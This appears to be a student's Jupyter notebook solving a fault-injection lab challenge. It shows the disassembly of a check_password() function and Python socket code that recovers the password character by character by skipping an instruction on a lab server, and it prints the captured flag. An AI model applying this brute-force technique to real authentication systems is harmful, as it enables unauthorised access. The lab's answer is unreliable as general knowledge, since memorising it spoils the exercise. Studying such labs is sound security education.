# Fault injection simulation example

This template will help you understand how fault injection works.

The following graph will show you the disassembly of the `check_password()` function. 
Try to bypass the authentication and retrieve the flag ;)

```
    ┌──────────────────────────────────────────────────────┐
    │  0x1209                                              │
    │ 91: sym.check_password (int64_t arg1, int64_t arg2); │
    │ ; arg int64_t arg1 @ rdi                             │
    │ ; arg int64_t arg2 @ rsi                             │
    │ ; var int64_t var_1h @ rbp-0x1                       │
    │ ; var int64_t var_2h @ rbp-0x2                       │
    │ ; var int64_t var_18h @ rbp-0x18                     │
    │ ; var int64_t var_20h @ rbp-0x20                     │
    │ push rbp                                             │
    │ mov rbp, rsp                                         │
    │ ; arg1                                               │
    │ mov qword [var_18h], rdi                             │
    │ ; arg2                                               │
    │ mov qword [var_20h], rsi                             │
    │ mov byte [var_2h], 0                                 │
    │ mov byte [var_1h], 0                                 │
    │ jmp 0x124a                                           │
    └──────────────────────────────────────────────────────┘
        v
        │
       ┌┘
┌────────┐
│      │ │                                                      
│┌─────────────────────────────────────────────────────────────┐
││  0x124a                                                     │
││ ; CODE XREFS from sym.check_password @ 0x1209(x), 0x121d(x) │
││ cmp byte [var_1h], 0xf                                      │
││ jbe 0x121f                                                  │
│└─────────────────────────────────────────────────────────────┘
│        f t
│        │ │
│        │ │
│        └───────────────────────────────────┐
│          │                                 │                      
│      ┌─────────────────────────────┐   ┌─────────────────────────┐
│      │  0x121f                     │   │  0x1250                 │
│      │ movzx edx, byte [var_1h]    │   │ cmp byte [var_2h], 0    │
│      │ mov rax, qword [var_18h]    │   │ jne 0x125d              │
│      │ add rax, rdx                │   └─────────────────────────┘
│      │ movzx ecx, byte [rax]       │           f t
│      │ movzx edx, byte [var_1h]    │           │ │
│      │ mov rax, qword [var_20h]    │           │ │
│      │ add rax, rdx                │           │ │
│      │ movzx eax, byte [rax]       │           │ │
│      │ xor eax, ecx                │           │ │
│      │ or byte [var_2h], al        │           │ │
│      │ movzx eax, byte [var_1h]    │           │ │
│      │ add eax, 1                  │           │ │
│      │ mov byte [var_1h], al       │           │ │
│      └─────────────────────────────┘           │ │
│          v                                     │ │
│          │                                     │ │
└──────────┘                                     │ │
                                                 │ └────────┐
                                  ┌──────────────┘          │
                                  │                         │                 
                              ┌────────────────────┐    ┌────────────────────┐
                              │  0x1256            │    │  0x125d            │
                              │ mov eax, 1         │    │ mov eax, 0         │
                              │ jmp 0x1262         │    └────────────────────┘
                              └────────────────────┘        v
                                  v                         │
                                  │                         │
                             ┌────┘                         │
                             │ ┌────────────────────────────┘
                             │ │                                                      
                       ┌─────────────────────────────────────────────────────────────┐
                       │  0x1262                                                     │
                       │ ; CODE XREFS from sym.check_password @ 0x1209(x), 0x125b(x) │
                       │ pop rbp                                                     │
                       │ ret                                                         │
                       └─────────────────────────────────────────────────────────────┘
```

In [2]:
import socket
import time

In [3]:
HOST = 'iict-mv330-sfa.einet.ad.eivd.ch'
PORT = 5000

In [50]:
# Helper functions

def recv_until(s, msg):
    buf = b''
    while 1:
        buf += s.recv(1)
        if msg in buf:
            break

def sample(password, step):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((HOST, PORT))
    recv_until(s, b'Enter password: ')
    s.sendall(password+b'\n')
    recv_until(s, b'Enter instruction number:')
    s.sendall(str(step).encode() + b'\n')
    recv_until(s, b'Skipping')
    data = s.recv(1000)
    data = s.recv(1000)
    s.close()
    return 'Well done' in data.decode()

In [60]:
#Example, try 1234 as password, and skip first instruction
char_set = b'0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ@{}'
password = ''
for i in range(16):
  offset = 19+15*(i+1)
  for c in char_set:
      if sample(bytes(password + chr(c), "UTF-8"), offset):
          # print(str(chr(c)))
          password += chr(c)
          break
  print(password)


H
HE
HEI
HEIG
HEIG{
HEIG{B
HEIG{B4
HEIG{B4d
HEIG{B4dP
HEIG{B4dP@
HEIG{B4dP@s
HEIG{B4dP@ss
HEIG{B4dP@ssw
HEIG{B4dP@sswr
HEIG{B4dP@sswrd
HEIG{B4dP@sswrd}
